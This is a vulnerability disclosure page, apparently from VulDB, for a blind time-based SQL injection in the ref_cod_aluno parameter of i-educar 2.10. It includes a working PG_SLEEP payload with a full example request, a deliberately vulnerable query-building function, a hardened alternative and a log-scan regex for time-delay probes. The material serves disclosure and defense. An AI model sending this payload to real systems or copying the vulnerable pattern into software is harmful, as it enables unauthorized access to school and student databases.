Submit #643549: Portabilis i-educar 2.10 SQL Injection

Title: Portabilis i-educar 2.10 SQL Injection
Description:

# SQL Injection (Blind Time-Based) Vulnerability in ref_cod_aluno Parameter on educar_historico_escolar_lst.php Endpoint

---

## Summary

A SQL Injection vulnerability was identified in the `educar_historico_escolar_lst.php` endpoint of the _i-educar_ application, specifically in the `ref_cod_aluno` parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data.

---

## Details

**Vulnerable Endpoint:** `/educar_historico_escolar_lst.php`

**Parameter:** `ref_cod_aluno`

The application fails to properly validate and sanitize user input in the `ref_cod_aluno` parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This may allow database enumeration, data exfiltration, modification, or denial of service via time-based delays.

---

## PoC

**Payload:** `AND 6986=(SELECT 6986 FROM PG_SLEEP(5))`

This payload introduces a **5-second time delay** in the server response, confirming that the parameter is vulnerable to blind time-based SQL injection.

**Example Request:**

```
GET /intranet/educar_historico_escolar_lst.php?ref_cod_aluno=206+AND+6986=(SELECT+6986+FROM+PG_SLEEP(5)) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: [COOKIE]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
```

![[Pasted image 20250818003041.png]]

The delayed response demonstrates that the injected SQL command was successfully executed by the backend database.

![[Pasted image 20250818003142.png]]

---

## Impact

- **Unauthorized data access:** Retrieving sensitive information such as credentials, personal data, or configuration details
- **Database enumeration:** Extracting schema names, tables, and column structures
- **Data manipulation:** Inserting, updating, or deleting database records
- **Denial of Service (DoS):** Using time-based injections to disrupt application availability
- **Potential privilege escalation or RCE:** Depending on database configuration and available functions

This vulnerability could lead to full compromise of the database and exposure of sensitive application and user data.
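As an added, defender-side example (not code from the advisory, the i-educar project, or VulDB), the following Python contrasts the pattern the advisory describes, a request parameter concatenated straight into SQL text, with a hardened version that validates `ref_cod_aluno` as a plain integer and binds it as a query parameter, and adds a small access-log scan that flags time-delay functions such as `PG_SLEEP` inside query strings. The function names, the table name `historico_escolar`, the psycopg2-style `%s` placeholder and the log lines are assumptions constructed for the example; only the `ref_cod_aluno` value is taken from the advisory's example request.

```python
"""Defender-side handling of an integer id parameter such as ref_cod_aluno.

Added example; not code from i-educar or from the advisory. Function names,
the table name and the log lines below are hypothetical / constructed.
"""
import re
from urllib.parse import parse_qs, urlparse

# Parameter value carried by the advisory's example request (decoded form).
INJECTED_VALUE = "206 AND 6986=(SELECT 6986 FROM PG_SLEEP(5))"

# psycopg2-style placeholder; the driver binds the value, so SQL and data never mix.
SAFE_SQL = "SELECT * FROM historico_escolar WHERE ref_cod_aluno = %s"


def build_query_unsafe(ref_cod_aluno: str) -> str:
    """Vulnerable pattern: the raw parameter becomes part of the WHERE clause,
    so any SQL the client sends is executed by the database."""
    return f"SELECT * FROM historico_escolar WHERE ref_cod_aluno = {ref_cod_aluno}"


def build_query_safe(ref_cod_aluno: str):
    """Hardened pattern: strict type validation plus a bound parameter.

    Returns (sql, params) for a positive integer id, or None when the value
    must be rejected (the caller should answer 400 rather than query at all).
    """
    if not re.fullmatch(r"[1-9][0-9]{0,9}", ref_cod_aluno.strip()):
        return None
    return SAFE_SQL, (int(ref_cod_aluno),)


# Common-log-format request line: client ip and the request path.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/')

# Time-delay functions used by blind time-based probes across common engines.
TIME_BASED = re.compile(
    r"pg_sleep\s*\(|\bsleep\s*\(|waitfor\s+delay|benchmark\s*\(",
    re.IGNORECASE,
)


def flag_time_based_probes(log_lines):
    """Return (client_ip, param_name, decoded_value) for every query-string
    parameter whose decoded value contains a time-delay SQL function."""
    hits = []
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        client_ip, path = match.groups()
        # parse_qs percent-decodes and turns '+' back into spaces.
        for name, values in parse_qs(urlparse(path).query).items():
            for value in values:
                if TIME_BASED.search(value):
                    hits.append((client_ip, name, value))
    return hits


# Constructed sample access log (not captured traffic): one benign lookup,
# one request carrying the advisory's payload, one benign paginated lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Aug/2025:00:30:41 +0000] "GET /intranet/educar_historico_escolar_lst.php'
    '?ref_cod_aluno=206 HTTP/1.1" 200 5123',
    '10.0.0.9 - - [18/Aug/2025:00:30:52 +0000] "GET /intranet/educar_historico_escolar_lst.php'
    '?ref_cod_aluno=206+AND+6986=(SELECT+6986+FROM+PG_SLEEP(5)) HTTP/1.1" 200 5123',
    '10.0.0.7 - - [18/Aug/2025:00:31:03 +0000] "GET /intranet/educar_historico_escolar_lst.php'
    '?ref_cod_aluno=207&pagina=2 HTTP/1.1" 200 4988',
]


if __name__ == "__main__":
    print("unsafe :", build_query_unsafe(INJECTED_VALUE))
    print("safe   :", build_query_safe("206"))
    print("reject :", build_query_safe(INJECTED_VALUE))
    for hit in flag_time_based_probes(SAMPLE_LOG):
        print("probe  :", hit)
```

The validation step is what closes the bug: an id parameter that is only ever a positive integer should never reach the query builder as free text, and the bound placeholder makes the remaining query immune to quoting tricks. The log scan is a coarse triage rule; it catches the exact probe shape in the advisory but should be paired with response-time monitoring on the endpoint, since obfuscated payloads will not match a fixed list of function names.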
Source: https://github.com/marcelomulder/CVE/blob/main/i-educar/SQL%20Injection%20(Blind%20Time-Based)%20Vulnerability%20in%20ref_cod_aluno%20Parameter%20on%20educar_historico_escolar_lst.php%20Endpoint.md
User: marceloQz (UID 87549)
Submission: 08/28/2025 21:10 (10 months ago)
Moderation: 09/05/2025 10:48 (8 days later)
Status: Accepted
VulDB entry: 322737 [Portabilis i-Educar up to 2.10 educar_historico_escolar_lst.php ref_cod_aluno sql injection]
Points: 20
